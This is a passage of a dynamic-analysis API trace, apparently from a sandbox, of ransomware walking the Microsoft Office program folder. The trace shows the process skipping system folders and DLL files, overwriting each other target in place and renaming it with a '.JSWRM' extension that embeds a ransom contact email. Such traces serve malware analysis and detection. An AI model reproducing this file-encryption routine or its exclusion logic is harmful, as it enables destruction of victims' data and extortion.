lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.EXE", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC.EXE", lpUsedDefaultChar=0x0) returned 9 [0137.040] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1bd7df5e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2=".") returned 1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="..") returned 1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="...") returned 1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="windows") returned -1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="recovery") returned -1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="perflogs") returned -1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="documents and settings") returned 1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="$RECYCLE.BIN") returned 1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="system volume information") returned -1 [0137.040] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="msocache") returned 1 [0137.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoutilstat.etw.man", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoutilstat.etw.man", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoutilstat.etw.man", lpUsedDefaultChar=0x0) returned 19 [0137.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoutilstat.etw.man", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoutilstat.etw.man", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoutilstat.etw.man", lpUsedDefaultChar=0x0) returned 19 [0137.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\msoutilstat.etw.man" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoutilstat.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.042] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=112678) returned 1 [0137.042] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.042] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1b820, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x1b820, lpOverlapped=0x0) returned 1 [0137.065] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.065] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1b820, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x1b820, lpOverlapped=0x0) returned 1 [0137.066] CloseHandle (hObject=0x45c) returned 1 [0137.066] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\msoutilstat.etw.man" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoutilstat.etw.man"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\msoutilstat.etw.man.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoutilstat.etw.man.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.068] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca4703d4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca4703d4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9eedd13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOUTL.OLB", cAlternateFileName="")) returned 1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2=".") returned 1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="..") returned 1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="...") returned 1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="windows") returned -1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="recovery") returned -1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="perflogs") returned -1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="documents and settings") returned 1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="$RECYCLE.BIN") returned 1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="system volume information") returned -1 [0137.068] lstrcmpiW (lpString1="MSOUTL.OLB", lpString2="msocache") returned 1 [0137.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTL.OLB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTL.OLB", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUTL.OLB", lpUsedDefaultChar=0x0) returned 10 [0137.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTL.OLB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTL.OLB", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUTL.OLB", lpUsedDefaultChar=0x0) returned 10 [0137.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSOUTL.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoutl.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.070] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=424640) returned 1 [0137.070] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.070] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.088] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.088] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.088] CloseHandle (hObject=0x45c) returned 1 [0137.088] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSOUTL.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoutl.olb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSOUTL.OLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoutl.olb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.090] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x7f63b8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x7f63b8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x46860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOUTLS.DLL", cAlternateFileName="")) returned 1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2=".") returned 1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="..") returned 1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="...") returned 1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="windows") returned -1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="recovery") returned -1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="perflogs") returned -1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="documents and settings") returned 1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="system volume information") returned -1 [0137.090] lstrcmpiW (lpString1="MSOUTLS.DLL", lpString2="msocache") returned 1 [0137.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTLS.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTLS.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUTLS.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTLS.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUTLS.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUTLS.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.090] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b580a61, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b580a61, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b580a61, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x14840, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPJEVTS.DLL", cAlternateFileName="")) returned 1 [0137.090] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2=".") returned 1 [0137.090] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="..") returned 1 [0137.090] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="...") returned 1 [0137.090] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="windows") returned -1 [0137.091] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="recovery") returned -1 [0137.091] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="perflogs") returned -1 [0137.091] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="documents and settings") returned 1 [0137.091] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.091] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="system volume information") returned -1 [0137.091] lstrcmpiW (lpString1="MSPJEVTS.DLL", lpString2="msocache") returned 1 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPJEVTS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPJEVTS.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPJEVTS.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPJEVTS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPJEVTS.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPJEVTS.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.091] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1bd7df5e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66a68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPPT.OLB", cAlternateFileName="")) returned 1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2=".") returned 1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="..") returned 1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="...") returned 1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="windows") returned -1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="recovery") returned -1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="perflogs") returned -1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="documents and settings") returned 1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="$RECYCLE.BIN") returned 1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="system volume information") returned -1 [0137.091] lstrcmpiW (lpString1="MSPPT.OLB", lpString2="msocache") returned 1 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPPT.OLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPPT.OLB", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPPT.OLB", lpUsedDefaultChar=0x0) returned 9 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPPT.OLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPPT.OLB", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPPT.OLB", lpUsedDefaultChar=0x0) returned 9 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPPT.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msppt.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.092] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=420456) returned 1 [0137.092] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.092] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.108] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.108] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.109] CloseHandle (hObject=0x45c) returned 1 [0137.109] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPPT.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msppt.olb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPPT.OLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msppt.olb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.125] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b87bb60, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c2c3dcb, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0xe80e8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPRJ.OLB", cAlternateFileName="")) returned 1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2=".") returned 1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="..") returned 1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="...") returned 1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="windows") returned -1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="recovery") returned -1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="perflogs") returned -1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="documents and settings") returned 1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="$RECYCLE.BIN") returned 1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="system volume information") returned -1 [0137.125] lstrcmpiW (lpString1="MSPRJ.OLB", lpString2="msocache") returned 1 [0137.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPRJ.OLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPRJ.OLB", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPRJ.OLB", lpUsedDefaultChar=0x0) returned 9 [0137.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPRJ.OLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPRJ.OLB", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPRJ.OLB", lpUsedDefaultChar=0x0) returned 9 [0137.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPRJ.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msprj.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.127] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=950504) returned 1 [0137.127] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.127] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.140] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.140] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.141] CloseHandle (hObject=0x45c) returned 1 [0137.141] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPRJ.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msprj.olb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPRJ.OLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msprj.olb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.142] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc3605252, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc3605252, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd4ff3b77, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4d8a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msproof7.dll", cAlternateFileName="")) returned 1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2=".") returned 1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="..") returned 1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="...") returned 1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="windows") returned -1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="recovery") returned -1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="perflogs") returned -1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="documents and settings") returned 1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.142] lstrcmpiW (lpString1="msproof7.dll", lpString2="system volume information") returned -1 [0137.142] lstrcmpiW 